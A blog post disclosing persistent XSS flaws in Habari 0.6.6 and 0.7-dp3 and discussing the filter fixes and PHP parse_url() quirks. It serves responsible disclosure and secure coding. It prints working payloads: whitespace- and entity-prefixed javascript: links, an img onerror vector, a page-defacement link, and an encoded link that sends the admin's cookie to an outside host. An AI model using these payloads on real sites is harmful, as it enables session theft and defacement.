I want to share some security issues, I discovered about a month ago in Habari. All the vulnerabilities, I'm talking about, are actually fixed in Habari 0.7 RC3 after my collaboration with the Habari security team. This last version has been announced today, therefore I hardly encourage Habari users to update their blog.

I recommend you to read the whole blogpost (it's not so boring), but if you want to skip the discussion about the Habari issues and check a nice trick for the PHP parse_url() function in order to bypass a protocol check (HREF attribute), then take a look at the end of this blogpost.

1. Habari 0.6.6 (current stable version)

1.1 The protocol check for a HREF attribute (in the name, email and comment fields) can be bypassed.

Habari allows users to insert HTML code in the post's comments, but the "filtering" process is not implemented in the right way. So let's consider the A tag; it is possible to insert links just inserting:

<a href="http://ss.ss">click</a>

While using a non-valid protocol, the code is rightly modified in:


It seems that the filtering process works good... Actually we can bypass the filter by inserting an initial whitespace character:

<a href=" javascript:alert(0)">click</a>

The protocol check is completely bypassed with this simple trick, I noticed that Habari requires a moderation for each comment, but an "unexperienced" admin could allow a malicious one and then click on it. I found the issue in the inputfilter.php, where the url is considered as relative when using the whitespace. A particular regex is not matched and it allows the bypass. You can check the code to better understand what happens and which is its behaviour.

inputfilter.php -> line 282

It should be modified in the following one:

inputfilter.php -> line 282
'(?P<scheme>[a-zA-Z ][^:]*):(//)?'

But it should be a very naive ( => bad) approach!! There are some other characters to bypass the filter, I'm going to talk below about them, be patient.. However it is not a good idea to mark a link as relative if it does not match the regex.

Note that the name (the user who comments) and the email fields are affected by the same issue.
So let's try to exploit this vulnerability with an effective attack. The email field is reported in the private section, so the blog administrator could directly click on it. An attacker is able to supply this vector in the email field:

<a href=" javascript:open(eval(String.fromCharCode(39,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,63,99,111,111,107,105,101,61,39,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)))">CLICK ME!</a>

That's too simple! We could also modify the admin page content by using the DOM.

<a href=" javascript:eval(document.getElementById('site').innerHTML+=' Free sex? :P Go <a href=http://www.badsite.com>here</a>');">CLICK ME</a>

Cool screenshot:

1.2 Open tags are not automatically closed by the filter, so this can break the output.

The filter does not check whether an open tag becomes closed at the end of the comment. The content of a page could be hardly modified, I mean, just opening the A tag the filter does not close it and whenever a new user tries to insert a new comment, he will click on the injected link.

<a href=" javascript:alert(0)">click me

This is not a very important issue, because the administrator is able to check quickly the tag balance, when he manages the comments; he can solve it by editing the comment content too.

2. Habari 0.7-dp3

2.1 The protocol check for a HREF attribute (in the name and comment fields) can be bypassed.

The email field is filtered successfully, but the name and the comment fields behave as before.

2.2 Open tags are not automatically closed by the filter, so this can break the output.

Read the 1.2 for information.

2.3 IMG tags are not sanitized.

We have a lot of ways to exploit this vulnerability, the simplest one can be achieved by employing the following vector:

<img src="X" onerror="alert(1)">

Notice that no user interaction is needed in this case!! If the admin allows a comment then all the users, who will visit our blog, will be "attacked". Wow! :P


The habari team decided to not solve the issues for Habari 0.6.6: inputfilter is drastically different than that one used in the 0.7 version. So they won't realize any fixes for the current stable version, but they hardly encourage everyone to upgrade to 0.7. So the (below mentioned) fixes are relative to the 0.7 version.


Let's concentrate on the parse_url and glue_url functions (inputfilter.php), they validate the URLs which are supplied in an attribute.

parse_url( $url ): it is based on the PHP's native parse_url(), but the preceding space actually "breaks" this last function! "This function parses a URL and returns an associative array containing any of the various components of the URL that are present", from the manual.
By supplying something like " javascript:blablabla", the returned array reports an empty 'scheme' ( == protocol ) and populates the slot 'path' with that string. It means that a lot of web applications, which does not correctly use that function, can be exploited... So even if the scheme is empty, we cannot immediately consider a URL as relative and safe.

The Habari security team proposed this fix: it employs the trim() function to remove all whitespaces from the URL ( -> naive approach ).

The filter can be bypassed again with HTML entities and the HEX encoding.

<a href="&#8;javascript:alert(0)">woot?!</a> // FF

<a href="&#160;&xa0;javascript:alert(0)">ooo</a> // Opera 11

Each entity in the URL is validated by the strip_illegal_entities( $str ) function, that calls _validate_entity( $m ). Therefore the injected entities are converted in the correspondent characters and then submitted to the filtering process. For istance &#8; is trivially "converted" to the BACKSPACE char (U+0008). There are a lot of other characters to bypass the trim(), because it strips very few chars at the beginning and end of the input string. Take a look at the following resources:

- bypassing-a-protocol-check-href-attribute (by me)
- location.protocol fuzzer (by Gareth Heyes)
- Web Application Obfuscation (book), chapter 2, URIs section.

Considering the previous concepts and the following two lines, the parsed URL is marked as relative. (code)

$r['is_pseudo'] = !in_array( $r['scheme'], array( 'http', 'https', '' ) );
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );

glue_url( $parsed_url ): it restores a URL separated by a parse_url() call. Let's consider to have " javascript:blablabla" as input, the only one job that will be done is to append the 'path' slot to the final restored URL.

if ( !empty( $parsed_url['path'] ) ) {
$res .= $parsed_url['path'];

So how can we solve the issue?!

  • To remove the & character -> bad, because & is useful in URLs.
  • To mark as non-relative an URL that does not contain '.' or '/' characters -> bad, because these can be used in the javascript content instead of the protocol.
  • To check whether the URL contains the ':' character -> Good way!! Notice that I do not mark as relative an URL that does contain the colon character.

I proposed the following patch in the inputfilter.parse_url() function:

$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );

$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] && (strpos($r['path'], ":") == false) );

In this way the issue is definitely solved!
Ok, Someone could think to bypass again the filter by using &#58; or &#x3a; (IE8)... This is absolutely wrong becuase of the strip_illegal_entities( $str ) function.

Habari guys decided to not follow my suggestion, but they preferred to apply a regular expression to the URL before parsing it. They wanted to trim any unicode whitespace-like characters from the string (and not just the ASCII ones PHP's trim() adopts), check this. Let's investigate again:

$url = ' javas cript:alert(0)';

$r = parse_url( preg_replace('/^[\pZ\pC]+|[\pZ\pC]+$/u', '', $url) );

// i) the regex matches strings that start or finish with a whitespace
// ii) info about pC and pZ: http://webcache.googleusercontent.com/search?q=cache:mCQugTShrlMJ:nadeausoftware.com/articles/2007/9/php_tip_how_strip_punctuation_characters_web_page+nadeausoft+how+to+strip&cd=3&hl=it&ct=clnk&gl=it&source=www.google.it
// iii) which characters are considered for the matching? *Some* of them are reported in http://www.bogofilter.org/pipermail/bogofilter/2003-March/001889.html

print_r ($r);


It looks to be a nice fix! Can we bypass the filter again? For sure, just supplying the whitespace in the middle of the URL!

<a href="javas cript:alert(0)">click</a>

Chrome and IE8 will definitely execute the alert! Actually I know three characters that can be used in the middle of the protocol in Chrome and IE 8, but of course they can change depending on the version of each browser.

1. U+0009 2. U+000A 3. U+000D

So Habari decided to follow a paranoid direction, that is the filter_var() function. FILTER_SANITIZE_URL filter removes all illegal URL characters from a string, cool! What about the IDNs? This stuff may cause some problems with any URLs, i.e. swedish ones. We should first encode the url content into punycode and then use that function, but this process can produce other issues... (The security team was aware of this point). They remarked that the ':' character is valid in a path and therefore my previous fix was not perfect.
Let's investigate by reading the RFC 3986, Relative Reference section:

A path segment that contains a colon character (e.g., "this:that") cannot be used as the first segment of a relative-path reference, as it would be mistaken for a scheme name. Such a segment must be preceded by a dot-segment (e.g., "./this:that") to make a relative-path reference.

So the best fix consists in checking whether a ':' char appears in the first segment of a relative-path reference. I proposed a fix that works in this direction and it's a very good solution in my opinion:

$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );

if ( strlen($parsed['path']) > 0 ) {
$s = substr($parsed['path'], 0, 1);

// relative-path reference -> !(network-path reference OR absolute-path reference)
if ( $s != '/' ) {
$n = explode('/', $parsed['path']);

// avoid something like this: javascript:alert(0)+[]+/sd/.source
if ( count($n) > 1 && strpos($n[0], ':') )
$r['is_relative'] = false;
// avoid something like this: javascript:alert(0)
else if ( count($n) == 1 && strpos($parsed['path'], ':') )
$r['is_relative'] = false;

if ( $r['is_pseudo'] ) {

At the end the Habari security team decided to fix in a cool way, that is by extracting the clean supplied scheme. Moreover the solution uses the PHP filter_var() SANITIZE_URL filter to get a true clean sanitized scheme, but employs the non-sanitized URL to parse the rest of the data in order to allow IDNs. So this is not the most elegant way, but probably the most clean.

I have also to report this, that is the fix to avoid HTML in the name field.


Actually there is no solution, with any luck it'll get fixed soon. However you can check the ticket here.


IMG tags were considered as special cases because of their "selfclosing" behaviour. First of all, the Habari team decided to remove any un-matched types of nodes (details), then they decided to use a whitelist for the attributes in the IMG tags (src and alt) and improve the conditional that determined if an attribute was valid (details).

As said before, all these vulnerabilities have been fixed and reported in the release notes and here. Some of the fixes have been done in the RC2, the URL filtering issue affects this last version, so you have to update to 0.7 RC3. The Habari security team took a lot of time to investigate and fix, but I understand that xss protection cannot be improved in just one day. :)
They did not credit me, but it does not really matter.
Update: They credited and thanked me by updating the Habari 0.7 release announcement. Thank you guys! :)
However I want to thank Chris Meller for his patience and his very constructive collaboration.


Comments about the PHP parse_url() function

Finally I want to stress the fact that some character in an URL force the PHP's native parse_url() to output an interesting array: the scheme will be empty, while the path will contain the real protocol (i.e. javascript).

So let's consider the following PHP script:

$url = ' javascript:alert(0)';

$r = parse_url($url);
print_r ($r);

Of course we have the following output:

javascript:alert(0)Array ( [scheme] => javascript [path] => alert(0) )
[space]javascript:alert(0)Array ( [path] => javascript:alert(0) )
&#8;javascript:alert(0)Array ( [path] => _javascript:alert(0) )
javascript:alert(0)Array ( [path] => javascript:alert(0) )
[tab]javascript:alert(0)Array ( [path] => _javascript:alert(0) )
[newline]javascript:alert(0)Array ( [path] => _javascript:alert(0) )
java[space]script:alert(0)Array ( [path] => java script:alert(0) )

Control characters are replaced by '_', while the spaces (U+0020) "force" the 'javascript' to appear as path, wherever they are supplied. Note that the php manual says: "This function doesn't work with relative URLs" and "This function is not meant to validate the given URL". So parse_url() is not bad to check a URL, but we need to use it in the right way!

0 Responses to Multiple persistent XSS vulnerabilities - Habari 0.6.6, 0.7-dp3 (inputfilter.php) - and comments about the fixes

  1. There are currently no comments.

Main Pages